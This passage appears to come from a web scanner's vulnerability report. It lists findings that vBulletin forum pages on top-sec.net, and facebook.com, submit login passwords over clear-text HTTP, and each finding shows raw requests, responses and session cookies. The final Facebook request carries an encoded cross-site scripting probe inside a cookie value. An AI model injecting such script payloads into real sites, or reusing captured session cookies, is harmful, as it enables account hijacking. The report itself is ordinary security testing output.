GET /vb/calendar.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:41 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:41 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:41 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Set-Cookie: bbcalendar=c4871a805a3492ec3258c39f4f4b9902074646b9a-1-%7Bs-7-.calyear._i-2011_%7D; path=/
Set-Cookie: bbcalendar=0902832cd087ecea4266c5df0ae36e34acb696eea-2-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-5_%7D; path=/
Set-Cookie: bbcalendar=5e8c771b8e4dad9bd1e6ffa8247223b3f9c17be0a-3-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.12. http://top-sec.net/vb/faq.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/faq.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/faq.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:47 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:47 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:47 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 38468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.13. http://top-sec.net/vb/forumdisplay.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/forumdisplay.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/forumdisplay.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:47 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 47809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.14. http://top-sec.net/vb/index.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/index.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:48 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 113812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
   <!-
...[SNIP]...

       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.15. http://top-sec.net/vb/login.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

POST /vb/login.php?do=login HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/vb/member.php?u=3
Cache-Control: max-age=0
Origin: http://top-sec.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0
Content-Length: 206

vb_login_username=%C7%D3%E3+%C7%E1%DA%D6%E6&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f00b204e9800998ec
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:06:33 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:06:33 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 48097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.16. http://top-sec.net/vb/member.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/member.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/member.php?u=3 HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/vb/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:05:57 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:05:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 51381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.17. http://top-sec.net/vb/memberlist.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/memberlist.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/memberlist.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 63971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.18. http://top-sec.net/vb/online.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/online.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/online.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
</script>
<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<input type="hidden" name="do" value="login" />
...[SNIP]...
<br /><input type="password" class="bginput" name="vb_login_password" size="50" tabindex="1" /></td>
...[SNIP]...

8.19. http://top-sec.net/vb/online.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/online.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.20. http://top-sec.net/vb/profile.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/profile.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/profile.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:55 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
</script>
<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<input type="hidden" name="do" value="login" />
...[SNIP]...
<br /><input type="password" class="bginput" name="vb_login_password" size="50" tabindex="1" /></td>
...[SNIP]...

8.21. http://top-sec.net/vb/profile.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/profile.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:55 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.22. http://top-sec.net/vb/search.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/search.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/search.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 54583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.23. http://top-sec.net/vb/sendmessage.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/sendmessage.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/sendmessage.php HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:09:31 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:09:31 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 39117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.24. http://top-sec.net/vb/showgroups.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/showgroups.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/showgroups.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 50015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.25. http://top-sec.net/vb/showthread.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/showthread.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/showthread.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 47808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.26. http://top-sec.net/vb/tags.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://top-sec.net
Path:	/vb/tags.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://top-sec.net/vb/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET /vb/tags.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:57 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 36821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...

<form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.27. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
